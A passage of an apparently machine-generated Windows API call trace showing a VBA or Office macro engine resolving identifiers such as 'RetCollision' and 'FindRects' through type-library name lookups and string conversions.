dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=14, lpWideCharStr=0x2e46a0, cchWideChar=14 | out: lpWideCharStr="_B_var_ShipTo") returned 14 [0045.475] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.475] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_ShipTo", lHashVal=0x10e739, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.475] IUnknown:Release (This=0x782a220) returned 0x21 [0045.475] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.475] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_ShipTo", lHashVal=0x10e739, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.475] IUnknown:Release (This=0x731da90) returned 0x15 [0045.475] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.475] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_ShipTo", lHashVal=0x10e739, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.475] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.475] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.475] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_ShipTo", lHashVal=0x10e739, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.475] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.475] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.475] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_ShipTo", lHashVal=0x10e739, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.475] IUnknown:Release (This=0x782b300) returned 0x6 [0045.475] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.475] IUnknown:Release (This=0x782a220) returned 0x21 [0045.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6056a, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="uch") returned 0 [0045.475] wcscpy_s (in: _Destination=0xb64ac68, _SizeInWords=0x4, _Source="uch" | out: _Destination="uch") returned 0x0 [0045.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RetCollision") returned 0x10b440 [0045.475] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0xd, _Src="RetCollision" | out: _Dst="RetCollision") returned 0x0 [0045.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=13, lpWideCharStr=0x2e44f0, cchWideChar=13 | out: lpWideCharStr="RetCollision") returned 13 [0045.475] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.475] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="RetCollision", lHashVal=0x10b440, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.475] IUnknown:Release (This=0x782a220) returned 0x21 [0045.475] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.475] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="RetCollision", lHashVal=0x10b440, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.475] IUnknown:Release (This=0x731da90) returned 0x15 [0045.475] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.475] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="RetCollision", lHashVal=0x10b440, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.475] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.475] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.475] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="RetCollision", lHashVal=0x10b440, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.475] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.475] IMalloc:Alloc (This=0x7fefe015380, cb=0x14) returned 0x72f72a0 [0045.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_RetCollision") returned 0x10ed9c [0045.476] strcpy_s (in: _Dst=0x2e4850, _DstSize=0x14, _Src="_B_var_RetCollision" | out: _Dst="_B_var_RetCollision") returned 0x0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=20, lpWideCharStr=0x2e46a0, cchWideChar=20 | out: lpWideCharStr="_B_var_RetCollision") returned 20 [0045.476] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.476] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_RetCollision", lHashVal=0x10ed9c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.476] IUnknown:Release (This=0x782a220) returned 0x21 [0045.476] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.476] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_RetCollision", lHashVal=0x10ed9c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.476] IUnknown:Release (This=0x731da90) returned 0x15 [0045.476] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.476] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_RetCollision", lHashVal=0x10ed9c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.476] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.476] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.476] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_RetCollision", lHashVal=0x10ed9c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.476] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.476] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.476] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_RetCollision", lHashVal=0x10ed9c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.476] IUnknown:Release (This=0x782b300) returned 0x6 [0045.476] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.476] IUnknown:Release (This=0x782a220) returned 0x21 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6056a, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="uch") returned 0 [0045.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RectsRet") returned 0x10b350 [0045.486] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x9, _Src="RectsRet" | out: _Dst="RectsRet") returned 0x0 [0045.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=9, lpWideCharStr=0x2e44f0, cchWideChar=9 | out: lpWideCharStr="RectsRet") returned 9 [0045.486] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.486] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="RectsRet", lHashVal=0x10b350, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.486] IUnknown:Release (This=0x782a220) returned 0x21 [0045.486] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.486] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="RectsRet", lHashVal=0x10b350, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.486] IUnknown:Release (This=0x731da90) returned 0x15 [0045.486] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.486] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="RectsRet", lHashVal=0x10b350, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.486] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.486] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.486] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="RectsRet", lHashVal=0x10b350, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.486] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.486] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0x72f72a0 [0045.487] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_RectsRet") returned 0x108ad9 [0045.487] strcpy_s (in: _Dst=0x2e4850, _DstSize=0x10, _Src="_B_var_RectsRet" | out: _Dst="_B_var_RectsRet") returned 0x0 [0045.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=16, lpWideCharStr=0x2e46a0, cchWideChar=16 | out: lpWideCharStr="_B_var_RectsRet") returned 16 [0045.487] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.487] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_RectsRet", lHashVal=0x108ad9, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.487] IUnknown:Release (This=0x782a220) returned 0x21 [0045.487] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.487] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_RectsRet", lHashVal=0x108ad9, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.487] IUnknown:Release (This=0x731da90) returned 0x15 [0045.487] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.487] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_RectsRet", lHashVal=0x108ad9, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.487] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.487] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.487] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_RectsRet", lHashVal=0x108ad9, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.487] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.487] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.487] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_RectsRet", lHashVal=0x108ad9, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.487] IUnknown:Release (This=0x782b300) returned 0x6 [0045.487] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.487] IUnknown:Release (This=0x782a220) returned 0x21 [0045.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.487] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0045.487] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0xa, _Src="FindRects" | out: _Dst="FindRects") returned 0x0 [0045.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=10, lpWideCharStr=0x2e44f0, cchWideChar=10 | out: lpWideCharStr="FindRects") returned 10 [0045.487] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.487] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="FindRects", lHashVal=0x10ada5, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.487] IUnknown:Release (This=0x782a220) returned 0x21 [0045.487] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.487] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="FindRects", lHashVal=0x10ada5, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.487] IUnknown:Release (This=0x731da90) returned 0x15 [0045.487] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.487] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="FindRects", lHashVal=0x10ada5, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.487] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.487] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.487] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="FindRects", lHashVal=0x10ada5, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.487] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.487] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0x72f72a0 [0045.488] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_FindRects") returned 0x10a769 [0045.488] strcpy_s (in: _Dst=0x2e4850, _DstSize=0x11, _Src="_B_var_FindRects" | out: _Dst="_B_var_FindRects") returned 0x0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=17, lpWideCharStr=0x2e46a0, cchWideChar=17 | out: lpWideCharStr="_B_var_FindRects") returned 17 [0045.488] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.488] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_FindRects", lHashVal=0x10a769, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.488] IUnknown:Release (This=0x782a220) returned 0x21 [0045.488] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.488] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_FindRects", lHashVal=0x10a769, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.488] IUnknown:Release (This=0x731da90) returned 0x15 [0045.488] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.488] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_FindRects", lHashVal=0x10a769, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.488] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.488] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.488] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_FindRects", lHashVal=0x10a769, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.488] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.488] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.488] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_FindRects", lHashVal=0x10a769, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.488] IUnknown:Release (This=0x782b300) returned 0x6 [0045.488] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.488] IUnknown:Release (This=0x782a220) returned 0x21 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.488] wcscpy_s (in: _Destination=0xb64ac78, _SizeInWords=0x4, _Source="ret" | out: _Destination="ret") returned 0x0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6056a, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="uch") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6056a, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="uch") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6056a, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="uch") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822c22, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="ret") returned 0 [0045.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 